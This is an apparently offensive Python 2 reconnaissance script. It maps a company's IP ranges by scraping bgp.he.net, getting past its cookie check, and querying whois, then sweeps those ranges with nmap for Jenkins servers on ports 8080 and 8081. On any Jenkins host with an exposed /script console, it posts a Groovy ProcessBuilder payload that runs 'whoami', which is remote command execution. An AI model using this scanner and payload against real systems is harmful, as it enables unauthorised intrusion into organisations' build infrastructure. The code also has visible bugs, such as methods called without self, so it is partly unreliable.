class FindJenkins(object):
def __init__(self):
super(FindJenkins, self).__init__()
self.globalVariables=GlobalVariables()
self.session = requests.Session()
def GetUser(self,IP,PORT,FILE,CRUMB):
URL = "http://"+IP+":"+PORT+""+FILE+""
paramsPost = {"Jenkins-Crumb":""+CRUMB+"","json":"{\"script\": \"println new ProcessBuilder(\\\"sh\\\",\\\"-c\\\",\\\"whoami\\\").redirectErrorStream(true).start().text\", \"\": \"\\\"\", \"Jenkins-Crumb\": \"4aa6395666702e283f9f3727c4a6df12\"}","Submit":"Run","script":"println new ProcessBuilder(\"sh\",\"-c\",\"whoami\").redirectErrorStream(true).start().text"}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-GB,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":URL,"Content-Type":"application/x-www-form-urlencoded"}
response = self.session.post(URL, data=paramsPost, headers=headers, timeout=15, verify=False)
result = response.text
user = re.compile('<h2>Result</h2><pre>(.+?)\n').findall(response.text)[0]
return user
def TestJenkins(self, IP,PORT):
FILE="/script"
URL = "http://"+IP+":"+PORT+""+FILE+""
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
response = self.session.get(URL, headers=headers, timeout=15, verify=False)
if "Jenkins" in response.text:
print "found"
if 'Jenkins-Crumb' in response.text:
CRUMB = re.compile('Jenkins-Crumb", "(.+?)"').findall(response.text)[0]
GetUser(IP,PORT,FILE,CRUMB)
else:
GetUser(IP,PORT,FILE,"")
else:
print "Not Found"
def EnumerateIPToFindJenkins(self, domain):
outUpIP="{}{}/{}".format(self.globalVariables.outputDir, domain, "upIP.txt")
outUpIPWithPort="{}{}/{}".format(self.globalVariables.outputDir, domain, "upIPWithPort.txt")
outIPv4Ranges="{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv4ranges.txt")
self.globalVariables.CommandExecutor("nmap -sP -iL {} | grep -E -o '([0-9]{{1,3}}[\\.]){{3}}[0-9]{{1,3}}' > {}".format(outIPv4Ranges, outUpIP))
self.globalVariables.CommandExecutor("nmap -p8080,8081 -iL {} | grep -E -o '([0-9]{{1,3}}[\\.]){{3}}[0-9]{{1,3}}' | sort | uniq > {}".format(outUpIP, outUpIPWithPort))
#self.outIPv6Ranges="{}{}/{}".format(self.globalVariables.outputDir, domain, "ipv6ranges.txt")
upHostFile = open(outUpIPWithPort, "r")
for host in upHostFile:
try:
self.TestJenkins(host.strip(), '8080')
except:
print host.strip() + ": Not find"
try:
self.TestJenkins(host.strip(), '8081')
except:
print host.strip() + ": Not find"
class CollectIPSpaces(object):
"""docstring for CollectIPSpaces"""
def __init__(self):
super(CollectIPSpaces, self).__init__()
self.globalVariables = GlobalVariables()
def get_path_cookie_digest(self):
result = ''
headerVal = ''
requetURL = "https://bgp.he.net/search?search%5Bsearch%5D=google&commit=Search"
response = requests.head(requetURL,
headers=self.globalVariables.bgp_headers,
timeout=10)
for header in (response.headers['Set-Cookie']).split(" "):
if header.find("path=") == 0 and header.find("--") != -1:
headerVal = header.split("=")[1]
headerVal = headerVal.split(";")[0]
decodedHeaderVal = urllib.unquote(headerVal)
result = hashlib.md5(decodedHeaderVal.encode())
return headerVal, result.hexdigest()
def get_external_ip_digest(self):
externalIP = requests.get('http://ip.42.pl/raw').text
result = hashlib.md5(externalIP.encode())
return result.hexdigest()
def get_bgp_session_cookie(self):
requetURL = "https://bgp.he.net/jc"
sessionCookieHeaderVal = ''
headerVal, cookieDigest = self.get_path_cookie_digest()
response = requests.head(requetURL,
data={
'p': cookieDigest,
'i': self.get_external_ip_digest()
},
cookies={'path': headerVal},
headers=self.globalVariables.bgp_headers,
timeout=10)
for header in (response.headers['Set-Cookie']).split(" "):
if header.find("c=") == 0 and header.find("--") != -1:
headerVal = header.split("=")[1]
sessionCookieHeaderVal = headerVal.split(";")[0]
return sessionCookieHeaderVal
def bgp_he_net_ipspaces(self, companyName, domain):
ipRanges = []
finalRanges = []
outBgpHeNet = "{}{}/{}".format(self.globalVariables.outputDir, domain,
"bgp_he_net.txt")
requetURL = "https://bgp.he.net/search?search%5Bsearch%5D={}&commit=Search".format(
companyName)
request = requests.get(requetURL,
cookies={'c': self.get_bgp_session_cookie()},
headers=self.globalVariables.bgp_headers,
timeout=10)
soup = BeautifulSoup(request.text, "lxml")
result = ''
for column in soup.findAll("td"):
try:
data = column.find("a").string
result += data + "\n"
ipRanges.append(data)
except:
"exception raised"
self.globalVariables.WriteTextToFile(outBgpHeNet, result)
resultIPv4 = ''
resultIPv6 = ''
self.outIPv4Ranges = "{}{}/{}".format(self.globalVariables.outputDir,
domain, "ipv4ranges.txt")
self.outIPv6Ranges = "{}{}/{}".format(self.globalVariables.outputDir,
domain, "ipv6ranges.txt")
for ipRange in ipRanges:
if ipRange.find("/") != -1:
if ipRange.find(":") != -1:
resultIPv6 += ipRange + "\n"
else:
resultIPv4 += ipRange + "\n"
if ipRange not in finalRanges:
finalRanges.append(ipRange)
elif ipRange.find("AS") == 0:
for data in self.whoisIPSpaces(ipRange[2:]):
if data not in finalRanges:
if data.find(":") != -1:
resultIPv6 += data + "\n"
else:
resultIPv4 += data + "\n"
finalRanges.append(data)
self.globalVariables.WriteTextToFile(self.outIPv4Ranges, resultIPv4)
self.globalVariables.WriteTextToFile(self.outIPv6Ranges, resultIPv6)
return finalRanges
def whoisIPSpaces(self, asnNumber):
output = self.globalVariables.CommandExecutor(
"whois -h whois.radb.net -- '-i origin {}' | grep -Eo '([0-9.]+){{4}}/[0-9]+' | sort -n | uniq -c | cut -d' ' -f8"
.format(asnNumber))
return output.splitlines()
def GetAllIPSpaces(self, companyName, domain):
return self.bgp_he_net_ipspaces(companyName, domain)
#add ARIN & RIPE Processing
#whois.arin.net/ui/Query.do
#apps.db.ripe.net/db-web-ui
